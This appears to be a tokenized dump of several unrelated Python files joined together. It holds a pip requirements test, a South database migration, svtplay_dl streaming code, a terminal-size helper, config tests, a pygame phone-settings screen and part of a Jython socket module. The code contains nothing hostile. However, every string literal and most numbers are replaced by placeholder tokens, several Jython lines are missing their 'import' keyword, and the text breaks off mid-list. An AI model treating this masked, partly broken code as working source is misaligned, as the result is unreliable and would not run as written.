<EOL> st_req = SetupToolsRequirement ( pr . Requirement . parse ( req_str ) ) <EOL> self . assertDictEqual ( exp_dict , st_req . to_dict ( ) ) <EOL> def test_PipVCSInstallRequirement ( self ) : <EOL> requirements_str = """<STR_LIT>""" <EOL> expected = [ <EOL> { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT:key>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , '<STR_LIT>' : None , '<STR_LIT>' : None , '<STR_LIT>' : None , '<STR_LIT>' : None , <EOL> '<STR_LIT>' : False , '<STR_LIT>' : None , <EOL> } , <EOL> { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT:key>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , '<STR_LIT>' : None , '<STR_LIT>' : None , '<STR_LIT>' : None , '<STR_LIT>' : None , <EOL> '<STR_LIT>' : False , '<STR_LIT>' : None , <EOL> } , <EOL> { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT:key>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:bar>' , <EOL> '<STR_LIT>' : '<STR_LIT:bar>' , <EOL> '<STR_LIT>' : [ ] , '<STR_LIT>' : ( ) , '<STR_LIT>' : None , '<STR_LIT>' : None , '<STR_LIT>' : False , <EOL> } , <EOL> ] <EOL> _ , requirements_file = tempfile . mkstemp ( ) <EOL> with open ( requirements_file , '<STR_LIT:w>' ) as f : <EOL> f . write ( requirements_str ) <EOL> pip_reqs = req . parse_requirements ( requirements_file , session = pip . download . PipSession ( ) ) <EOL> reqs = [ PipURLInstallRequirement ( r ) . to_dict ( ) for r in pip_reqs ] <EOL> os . remove ( requirements_file ) <EOL> self . assertListEqual ( expected , reqs ) </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . create_table ( u'<STR_LIT>' , ( <EOL> ( u'<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT:name>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:32> ) ) , <EOL> ( '<STR_LIT:url>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:64> ) ) , <EOL> ) ) <EOL> db . send_create_signal ( u'<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> db . create_table ( u'<STR_LIT>' , ( <EOL> ( u'<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT:password>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = datetime . datetime . now ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = False ) ) , <EOL> ( '<STR_LIT:username>' , self . gf ( '<STR_LIT>' ) ( unique = True , max_length = <NUM_LIT:30> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:30> , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:30> , blank = True ) ) , <EOL> ( '<STR_LIT:email>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT> , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = False ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = datetime . datetime . now ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = False ) ) , <EOL> ) ) <EOL> db . send_create_signal ( u'<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> m2m_table_name = db . shorten_name ( u'<STR_LIT>' ) <EOL> db . create_table ( m2m_table_name , ( <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , primary_key = True , auto_created = True ) ) , <EOL> ( '<STR_LIT>' , models . 
ForeignKey ( orm [ u'<STR_LIT>' ] , null = False ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( orm [ u'<STR_LIT>' ] , null = False ) ) <EOL> ) ) <EOL> db . create_unique ( m2m_table_name , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> m2m_table_name = db . shorten_name ( u'<STR_LIT>' ) <EOL> db . create_table ( m2m_table_name , ( <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , primary_key = True , auto_created = True ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( orm [ u'<STR_LIT>' ] , null = False ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( orm [ u'<STR_LIT>' ] , null = False ) ) <EOL> ) ) <EOL> db . create_unique ( m2m_table_name , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_table ( u'<STR_LIT>' ) <EOL> db . delete_table ( u'<STR_LIT>' ) <EOL> db . delete_table ( db . shorten_name ( u'<STR_LIT>' ) ) <EOL> db . delete_table ( db . shorten_name ( u'<STR_LIT>' ) ) <EOL> models = { <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> 
'<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:url>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> 
u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> from __future__ import absolute_import <EOL> class UIException ( Exception ) : <EOL> pass <EOL> class ServiceError ( Exception ) : <EOL> pass <EOL> class NoRequestedProtocols ( UIException ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , requested , found ) : <EOL> """<STR_LIT>""" <EOL> self . requested = requested <EOL> self . found = found <EOL> super ( NoRequestedProtocols , self ) . __init__ ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( <EOL> self . found , self . requested <EOL> ) <EOL> ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( <EOL> self . requested , self . found ) </s>
<s> from __future__ import absolute_import <EOL> import re <EOL> import copy <EOL> import xml . etree . ElementTree as ET <EOL> from svtplay_dl . service import Service , OpenGraphThumbMixin <EOL> from svtplay_dl . utils import is_py2_old <EOL> from svtplay_dl . error import ServiceError <EOL> from svtplay_dl . fetcher . rtmp import RTMP <EOL> class Qbrick ( Service , OpenGraphThumbMixin ) : <EOL> supported_domains = [ '<STR_LIT>' ] <EOL> def get ( self ) : <EOL> data = self . get_urldata ( ) <EOL> if self . exclude ( self . options ) : <EOL> yield ServiceError ( "<STR_LIT>" ) <EOL> return <EOL> if re . findall ( r"<STR_LIT>" , self . url ) : <EOL> match = re . search ( "<STR_LIT>" , data ) <EOL> if not match : <EOL> yield ServiceError ( "<STR_LIT>" % self . url ) <EOL> return <EOL> data = self . http . request ( "<STR_LIT>" , match . group ( <NUM_LIT:1> ) ) . content <EOL> match = re . search ( r"<STR_LIT>" , data ) <EOL> if not match : <EOL> yield ServiceError ( "<STR_LIT>" % self . url ) <EOL> return <EOL> host = "<STR_LIT>" % match . group ( <NUM_LIT:1> ) <EOL> else : <EOL> yield ServiceError ( "<STR_LIT>" % self . url ) <EOL> return <EOL> data = self . http . request ( "<STR_LIT>" , host ) . content <EOL> xml = ET . XML ( data ) <EOL> try : <EOL> url = xml . find ( "<STR_LIT>" ) . find ( "<STR_LIT>" ) . find ( "<STR_LIT>" ) . find ( "<STR_LIT>" ) . find ( "<STR_LIT>" ) . find ( "<STR_LIT>" ) . text <EOL> except AttributeError : <EOL> yield ServiceError ( "<STR_LIT>" ) <EOL> return <EOL> live = xml . find ( "<STR_LIT>" ) . find ( "<STR_LIT>" ) . find ( "<STR_LIT>" ) . find ( "<STR_LIT>" ) . attrib [ "<STR_LIT>" ] <EOL> if live == "<STR_LIT:true>" : <EOL> self . options . live = True <EOL> data = self . http . request ( "<STR_LIT>" , url ) . content <EOL> xml = ET . XML ( data ) <EOL> server = xml . find ( "<STR_LIT>" ) . find ( "<STR_LIT>" ) . attrib [ "<STR_LIT>" ] <EOL> streams = xml . find ( "<STR_LIT:body>" ) . 
find ( "<STR_LIT>" ) <EOL> if is_py2_old : <EOL> sa = list ( streams . getiterator ( "<STR_LIT>" ) ) <EOL> else : <EOL> sa = list ( streams . iter ( "<STR_LIT>" ) ) <EOL> for i in sa : <EOL> self . options . other = "<STR_LIT>" % i . attrib [ "<STR_LIT:src>" ] <EOL> yield RTMP ( copy . copy ( self . options ) , server , i . attrib [ "<STR_LIT>" ] ) </s>
<s> import os <EOL> import shlex <EOL> import struct <EOL> import platform <EOL> import subprocess <EOL> def get_terminal_size ( ) : <EOL> """<STR_LIT>""" <EOL> current_os = platform . system ( ) <EOL> tuple_xy = None <EOL> if current_os == '<STR_LIT>' : <EOL> tuple_xy = _get_terminal_size_windows ( ) <EOL> if tuple_xy is None : <EOL> tuple_xy = _get_terminal_size_tput ( ) <EOL> if current_os in [ '<STR_LIT>' , '<STR_LIT>' ] or current_os . startswith ( '<STR_LIT>' ) : <EOL> tuple_xy = _get_terminal_size_linux ( ) <EOL> if tuple_xy is None : <EOL> tuple_xy = ( <NUM_LIT> , <NUM_LIT> ) <EOL> return tuple_xy <EOL> def _get_terminal_size_windows ( ) : <EOL> try : <EOL> from ctypes import windll , create_string_buffer <EOL> h = windll . kernel32 . GetStdHandle ( - <NUM_LIT:12> ) <EOL> csbi = create_string_buffer ( <NUM_LIT> ) <EOL> res = windll . kernel32 . GetConsoleScreenBufferInfo ( h , csbi ) <EOL> if res : <EOL> ( bufx , bufy , curx , cury , wattr , <EOL> left , top , right , bottom , <EOL> maxx , maxy ) = struct . unpack ( "<STR_LIT>" , csbi . raw ) <EOL> sizex = right - left + <NUM_LIT:1> <EOL> sizey = bottom - top + <NUM_LIT:1> <EOL> return sizex , sizey <EOL> except : <EOL> pass <EOL> def _get_terminal_size_tput ( ) : <EOL> try : <EOL> cols = int ( subprocess . check_call ( shlex . split ( '<STR_LIT>' ) ) ) <EOL> rows = int ( subprocess . check_call ( shlex . split ( '<STR_LIT>' ) ) ) <EOL> return ( cols , rows ) <EOL> except : <EOL> pass <EOL> def _get_terminal_size_linux ( ) : <EOL> def ioctl_GWINSZ ( fd ) : <EOL> try : <EOL> import fcntl <EOL> import termios <EOL> cr = struct . unpack ( '<STR_LIT>' , <EOL> fcntl . ioctl ( fd , termios . TIOCGWINSZ , '<STR_LIT>' ) ) <EOL> return cr <EOL> except : <EOL> pass <EOL> cr = ioctl_GWINSZ ( <NUM_LIT:0> ) or ioctl_GWINSZ ( <NUM_LIT:1> ) or ioctl_GWINSZ ( <NUM_LIT:2> ) <EOL> if not cr : <EOL> try : <EOL> fd = os . open ( os . ctermid ( ) , os . O_RDONLY ) <EOL> cr = ioctl_GWINSZ ( fd ) <EOL> os . 
close ( fd ) <EOL> except : <EOL> pass <EOL> if not cr : <EOL> try : <EOL> cr = ( os . environ [ '<STR_LIT>' ] , os . environ [ '<STR_LIT>' ] ) <EOL> except : <EOL> return None <EOL> return int ( cr [ <NUM_LIT:1> ] ) , int ( cr [ <NUM_LIT:0> ] ) </s>
<s> from busbus . util import Config <EOL> import os <EOL> import pytest <EOL> def test_config_defaults ( ) : <EOL> config = Config ( ) <EOL> assert config [ '<STR_LIT>' ] . endswith ( '<STR_LIT>' ) <EOL> def test_config_without_home ( ) : <EOL> old_home = os . environ [ '<STR_LIT>' ] <EOL> del os . environ [ '<STR_LIT>' ] <EOL> config = Config ( ) <EOL> assert ( os . path . abspath ( config [ '<STR_LIT>' ] ) == <EOL> os . path . abspath ( '<STR_LIT>' ) ) <EOL> os . environ [ '<STR_LIT>' ] = old_home <EOL> def test_config_busbus_dir ( ) : <EOL> config = Config ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert config [ '<STR_LIT>' ] == '<STR_LIT>' <EOL> def test_config_keyerror ( ) : <EOL> config = Config ( ) <EOL> with pytest . raises ( KeyError ) as exc : <EOL> config [ '<STR_LIT>' ] <EOL> assert exc . value . args [ <NUM_LIT:0> ] == '<STR_LIT>' </s>
<s> """<STR_LIT>""" </s>
<s> from subprocess import Popen <EOL> import sys <EOL> import pygame <EOL> class Run ( ) : <EOL> def __init__ ( self , fona ) : <EOL> self . fona = fona <EOL> self . headset = False <EOL> self . get_audio_mode ( ) <EOL> self . RED = ( <NUM_LIT:255> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . GREEN = ( <NUM_LIT:0> , <NUM_LIT:255> , <NUM_LIT:0> ) <EOL> self . WHITE = ( <NUM_LIT:255> , <NUM_LIT:255> , <NUM_LIT:255> ) <EOL> self . menu = pygame . image . load ( '<STR_LIT>' ) <EOL> self . menu_rect = self . menu . get_rect ( ) <EOL> self . font = pygame . font . Font ( '<STR_LIT>' , <NUM_LIT:32> ) <EOL> self . off = self . font . render ( '<STR_LIT>' , True , self . RED , self . WHITE ) <EOL> self . fona_power = self . font . render ( '<STR_LIT>' , True , self . GREEN , self . WHITE ) <EOL> self . fona_power_rect = self . off . get_rect ( ) <EOL> self . fona_power_rect . centerx = <NUM_LIT> <EOL> self . fona_power_rect . centery = <NUM_LIT> <EOL> self . on = self . font . render ( '<STR_LIT>' , True , self . GREEN , self . WHITE ) <EOL> self . rect = self . off . get_rect ( ) <EOL> self . rect . centerx = <NUM_LIT> <EOL> self . rect . y = <NUM_LIT> <EOL> self . exit = False <EOL> self . blit_one_surface = { '<STR_LIT>' : [ ] , '<STR_LIT>' : [ ] } <EOL> self . blit = { '<STR_LIT>' : [ self . menu , self . fona_power , self . off ] , '<STR_LIT>' : [ self . menu_rect , self . fona_power_rect , self . rect ] } <EOL> if self . headset : <EOL> self . blit [ '<STR_LIT>' ] [ <NUM_LIT:2> ] = self . on <EOL> else : <EOL> self . blit [ '<STR_LIT>' ] [ <NUM_LIT:2> ] = self . off <EOL> self . next_app = None <EOL> def get_audio_mode ( self ) : <EOL> audio_config = open ( '<STR_LIT>' , '<STR_LIT:r>' ) <EOL> file = audio_config . readlines ( ) <EOL> for i in range ( <NUM_LIT:0> , len ( file ) ) : <EOL> if file [ i ] [ <NUM_LIT:0> ] == '<STR_LIT:#>' : <EOL> pass <EOL> else : <EOL> file [ i ] = file [ i ] . 
rstrip ( ) <EOL> if '<STR_LIT>' in file [ i ] : <EOL> mode = file [ i ] <EOL> mode = mode . split ( '<STR_LIT:=>' ) <EOL> self . mode = int ( mode [ <NUM_LIT:1> ] ) <EOL> if self . mode == <NUM_LIT:1> : <EOL> self . headset = False <EOL> else : <EOL> self . headset = True <EOL> def run_app ( self ) : <EOL> pass <EOL> def get_events ( self , event ) : <EOL> if event . pos [ <NUM_LIT:1> ] > <NUM_LIT> and event . pos [ <NUM_LIT:1> ] < <NUM_LIT> : <EOL> self . delete_sms ( ) <EOL> if event . pos [ <NUM_LIT:1> ] > <NUM_LIT> and event . pos [ <NUM_LIT:1> ] < <NUM_LIT> : <EOL> self . set_headset ( ) <EOL> if event . pos [ <NUM_LIT:1> ] > <NUM_LIT> and event . pos [ <NUM_LIT:1> ] < <NUM_LIT> : <EOL> self . exit = True <EOL> def on_first_run ( self ) : <EOL> self . exit = False <EOL> def delete_sms ( self ) : <EOL> self . fona . transmit ( '<STR_LIT>' ) <EOL> self . exit = True <EOL> def set_headset ( self ) : <EOL> if self . headset : <EOL> self . blit [ '<STR_LIT>' ] [ <NUM_LIT:2> ] = self . off <EOL> self . headset = False <EOL> self . fona . transmit ( '<STR_LIT>' ) <EOL> else : <EOL> self . blit [ '<STR_LIT>' ] [ <NUM_LIT:2> ] = self . on <EOL> self . headset = True <EOL> self . fona . transmit ( '<STR_LIT>' ) </s>
<s> class SftpException ( Exception ) : pass <EOL> class SftpConfigException ( SftpException ) : pass <EOL> class SftpMountException ( SftpException ) : <EOL> def __init__ ( self , mount_cmd , mount_cmd_output ) : <EOL> self . mount_cmd = mount_cmd <EOL> self . mount_cmd_output = mount_cmd_output </s>
<s> """<STR_LIT>""" <EOL> _defaulttimeout = None <EOL> import errno <EOL> import jarray <EOL> import string <EOL> import struct <EOL> import sys <EOL> import threading <EOL> import time <EOL> import types <EOL> import java . io . BufferedInputStream <EOL> import java . io . BufferedOutputStream <EOL> import java . io . InterruptedIOException <EOL> import java . io . IOException <EOL> import java . lang . String <EOL> import java . lang . Exception <EOL> import java . net . DatagramPacket <EOL> import java . net . InetAddress <EOL> import java . net . InetSocketAddress <EOL> import java . net . Socket <EOL> import java . net . BindException <EOL> import java . net . ConnectException <EOL> import java . net . NoRouteToHostException <EOL> import java . net . PortUnreachableException <EOL> import java . net . ProtocolException <EOL> import java . net . SocketException <EOL> import java . net . SocketTimeoutException <EOL> import java . net . UnknownHostException <EOL> import java . nio . ByteBuffer <EOL> import java . nio . channels . DatagramChannel <EOL> import java . nio . channels . ServerSocketChannel <EOL> import java . nio . channels . SocketChannel <EOL> import java . nio . channels . AlreadyConnectedException <EOL> import java . nio . channels . AsynchronousCloseException <EOL> import java . nio . channels . CancelledKeyException <EOL> import java . nio . channels . ClosedByInterruptException <EOL> import java . nio . channels . ClosedChannelException <EOL> import java . nio . channels . ClosedSelectorException <EOL> import java . nio . channels . ConnectionPendingException <EOL> import java . nio . channels . IllegalBlockingModeException <EOL> import java . nio . channels . IllegalSelectorException <EOL> import java . nio . channels . NoConnectionPendingException <EOL> import java . nio . channels . NonReadableChannelException <EOL> import java . nio . channels . NonWritableChannelException <EOL> import java . nio . channels . 
NotYetBoundException <EOL> import java . nio . channels . NotYetConnectedException <EOL> import java . nio . channels . UnresolvedAddressException <EOL> import java . nio . channels . UnsupportedAddressTypeException <EOL> import javax . net . ssl . SSLSocketFactory <EOL> javax . net . ssl . SSLException <EOL> javax . net . ssl . SSLHandshakeException <EOL> javax . net . ssl . SSLKeyException <EOL> javax . net . ssl . SSLPeerUnverifiedException <EOL> javax . net . ssl . SSLProtocolException <EOL> import org . python . core . io . DatagramSocketIO <EOL> import org . python . core . io . ServerSocketIO <EOL> import org . python . core . io . SocketIO <EOL> from org . python . core . Py import newString as asPyString <EOL> class error ( Exception ) : pass <EOL> class herror ( error ) : pass <EOL> class gaierror ( error ) : pass <EOL> class timeout ( error ) : pass <EOL> class sslerror ( error ) : pass <EOL> ALL = None <EOL> _exception_map = { <EOL> ( java . io . IOException , ALL ) : lambda : error ( errno . ECONNRESET , '<STR_LIT>' ) , <EOL> ( java . io . InterruptedIOException , ALL ) : lambda : timeout ( '<STR_LIT>' ) , <EOL> ( java . net . BindException , ALL ) : lambda : error ( errno . EADDRINUSE , '<STR_LIT>' ) , <EOL> ( java . net . ConnectException , ALL ) : lambda : error ( errno . ECONNREFUSED , '<STR_LIT>' ) , <EOL> ( java . net . NoRouteToHostException , ALL ) : None , <EOL> ( java . net . PortUnreachableException , ALL ) : None , <EOL> ( java . net . ProtocolException , ALL ) : None , <EOL> ( java . net . SocketException , ALL ) : None , <EOL> ( java . net . SocketTimeoutException , ALL ) : lambda : timeout ( '<STR_LIT>' ) , <EOL> ( java . net . UnknownHostException , ALL ) : lambda : gaierror ( errno . EGETADDRINFOFAILED , '<STR_LIT>' ) , <EOL> ( java . nio . channels . AlreadyConnectedException , ALL ) : lambda : error ( errno . EISCONN , '<STR_LIT>' ) , <EOL> ( java . nio . channels . AsynchronousCloseException , ALL ) : None , <EOL> ( java . nio . 
channels . CancelledKeyException , ALL ) : None , <EOL> ( java . nio . channels . ClosedByInterruptException , ALL ) : None , <EOL> ( java . nio . channels . ClosedChannelException , ALL ) : lambda : error ( errno . EPIPE , '<STR_LIT>' ) , <EOL> ( java . nio . channels . ClosedSelectorException , ALL ) : None , <EOL> ( java . nio . channels . ConnectionPendingException , ALL ) : None , <EOL> ( java . nio . channels . IllegalBlockingModeException , ALL ) : None , <EOL> ( java . nio . channels . IllegalSelectorException , ALL ) : None , <EOL> ( java . nio . channels . NoConnectionPendingException , ALL ) : None , <EOL> ( java . nio . channels . NonReadableChannelException , ALL ) : None , <EOL> ( java . nio . channels . NonWritableChannelException , ALL ) : None , <EOL> ( java . nio . channels . NotYetBoundException , ALL ) : None , <EOL> ( java . nio . channels . NotYetConnectedException , ALL ) : None , <EOL> ( java . nio . channels . UnresolvedAddressException , ALL ) : lambda : gaierror ( errno . EGETADDRINFOFAILED , '<STR_LIT>' ) , <EOL> ( java . nio . channels . UnsupportedAddressTypeException , ALL ) : None , <EOL> ( javax . net . ssl . SSLException , ALL ) : lambda : sslerror ( - <NUM_LIT:1> , '<STR_LIT>' ) , <EOL> ( javax . net . ssl . SSLHandshakeException , ALL ) : lambda : sslerror ( - <NUM_LIT:1> , '<STR_LIT>' ) , <EOL> ( javax . net . ssl . SSLKeyException , ALL ) : lambda : sslerror ( - <NUM_LIT:1> , '<STR_LIT>' ) , <EOL> ( javax . net . ssl . SSLPeerUnverifiedException , ALL ) : lambda : sslerror ( - <NUM_LIT:1> , '<STR_LIT>' ) , <EOL> ( javax . net . ssl . SSLProtocolException , ALL ) : lambda : sslerror ( - <NUM_LIT:1> , '<STR_LIT>' ) , <EOL> } <EOL> def would_block_error ( exc = None ) : <EOL> return error ( errno . EWOULDBLOCK , '<STR_LIT>' ) <EOL> def _map_exception ( exc , circumstance = ALL ) : <EOL> mapped_exception = _exception_map . get ( ( exc . 
__class__ , circumstance ) ) <EOL> if mapped_exception : <EOL> exception = mapped_exception ( ) <EOL> else : <EOL> exception = error ( - <NUM_LIT:1> , '<STR_LIT>' % exc ) <EOL> exception . java_exception = exc <EOL> return exception <EOL> MODE_BLOCKING = '<STR_LIT>' <EOL> MODE_NONBLOCKING = '<STR_LIT>' <EOL> MODE_TIMEOUT = '<STR_LIT>' <EOL> _permitted_modes = ( MODE_BLOCKING , MODE_NONBLOCKING , MODE_TIMEOUT ) <EOL> SHUT_RD = <NUM_LIT:0> <EOL> SHUT_WR = <NUM_LIT:1> <EOL> SHUT_RDWR = <NUM_LIT:2> <EOL> AF_UNSPEC = <NUM_LIT:0> <EOL> AF_INET = <NUM_LIT:2> <EOL> AF_INET6 = <NUM_LIT> <EOL> AI_PASSIVE = <NUM_LIT:1> <EOL> AI_CANONNAME = <NUM_LIT:2> <EOL> SOCK_DGRAM = <NUM_LIT:1> <EOL> SOCK_STREAM = <NUM_LIT:2> <EOL> SOCK_RAW = <NUM_LIT:3> <EOL> SOCK_RDM = <NUM_LIT:4> <EOL> SOCK_SEQPACKET = <NUM_LIT:5> <EOL> SOL_SOCKET = <NUM_LIT> <EOL> IPPROTO_TCP = <NUM_LIT:6> <EOL> IPPROTO_UDP = <NUM_LIT> <EOL> SO_BROADCAST = <NUM_LIT:1> <EOL> SO_KEEPALIVE = <NUM_LIT:2> <EOL> SO_LINGER = <NUM_LIT:4> <EOL> SO_OOBINLINE = <NUM_LIT:8> <EOL> SO_RCVBUF = <NUM_LIT:16> <EOL> SO_REUSEADDR = <NUM_LIT:32> <EOL> SO_SNDBUF = <NUM_LIT:64> <EOL> SO_TIMEOUT = <NUM_LIT> <EOL> TCP_NODELAY = <NUM_LIT> <EOL> INADDR_ANY = "<STR_LIT>" <EOL> INADDR_BROADCAST = "<STR_LIT>" <EOL> SO_ACCEPTCONN = - <NUM_LIT:1> <EOL> SO_DEBUG = - <NUM_LIT:2> <EOL> SO_DONTROUTE = - <NUM_LIT:4> <EOL> SO_ERROR = - <NUM_LIT:8> <EOL> SO_EXCLUSIVEADDRUSE = - <NUM_LIT:16> <EOL> SO_RCVLOWAT = - <NUM_LIT:32> <EOL> SO_RCVTIMEO = - <NUM_LIT:64> <EOL> SO_REUSEPORT = - <NUM_LIT> <EOL> SO_SNDLOWAT = - <NUM_LIT> <EOL> SO_SNDTIMEO = - <NUM_LIT> <EOL> SO_TYPE = - <NUM_LIT> <EOL> SO_USELOOPBACK = - <NUM_LIT> <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , 
